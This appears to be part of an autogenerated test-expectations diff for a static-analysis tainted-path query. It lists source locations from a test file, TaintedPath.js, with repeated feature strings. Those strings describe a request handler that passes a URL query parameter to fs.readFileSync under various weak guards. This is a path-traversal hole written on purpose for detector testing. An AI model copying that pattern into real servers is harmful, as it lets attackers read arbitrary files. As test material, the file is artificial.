url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | path.in ... ecret") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | path.in ... ecret") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:34 | path.in ... ) == -1 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:34 | path.in ... ) == -1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:34 | path.in ... ) == -1 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:34 | path.in ... ) == -1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:34 | path.in ... ) == -1 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:20:12:20:18 | indexOf | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:12:20:18 | indexOf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:12:20:18 | indexOf | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:12:20:18 | indexOf | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:12:20:18 | indexOf | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:20:20:20:27 | "secret" | CalleeFlexibleAccessPath | path.indexOf | | autogenerated/TaintedPath/TaintedPath.js:20:20:20:27 | "secret" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:20:20:20:27 | "secret" | calleeImports | url | @@ -4768,6 +58578,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:20:20:20:27 | "secret" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:20:20:20:27 | "secret" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:20:20:20:27 | "secret" | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:20:33:20:34 | -1 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:33:20:34 | -1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:33:20:34 | -1 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:33:20:34 | -1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:33:20:34 | -1 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:20:34:20:34 | 1 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:34:20:34 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:34:20:34 | 1 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:34:20:34 | 1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:34:20:34 | 1 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:9 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:9 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:9 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:9 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:9 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:15 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:15 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:15 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:15 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:15 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:7:21:38 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:11:21:15 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:11:21:15 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:11:21:15 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:11:21:15 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:11:21:15 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:18 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:18 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:18 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:18 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:31 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:31 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:31 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:31 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:31 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4776,6 +58636,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:21:17:21:37 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:21:20:21:31 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:20:21:31 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:21:20:21:31 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:21:20:21:31 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:21:20:21:31 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:21:33:21:36 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:21:33:21:36 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:21:33:21:36 | path | calleeImports | fs | @@ -4785,6 +58650,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:21:33:21:36 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:21:33:21:36 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:21:33:21:36 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:8 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:8 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:8 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:8 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:8 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:19 | fs.existsSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:19 | fs.existsSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:19 | fs.existsSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:19 | fs.existsSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:19 | fs.existsSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | exceptional return of fs.existsSync(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | exceptional return of fs.existsSync(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | exceptional return of fs.existsSync(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | exceptional return of fs.existsSync(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | exceptional return of fs.existsSync(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | fs.existsSync(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | fs.existsSync(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | fs.existsSync(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | fs.existsSync(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:23:7:23:25 | fs.existsSync(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:23:10:23:19 | existsSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:10:23:19 | existsSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:23:10:23:19 | existsSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:23:10:23:19 | existsSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:23:10:23:19 | existsSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:23:21:23:24 | path | CalleeFlexibleAccessPath | fs.existsSync | | autogenerated/TaintedPath/TaintedPath.js:23:21:23:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:23:21:23:24 | path | calleeImports | fs | @@ -4794,6 +58684,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:23:21:23:24 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:23:21:23:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:23:21:23:24 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:9 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:9 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:9 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path 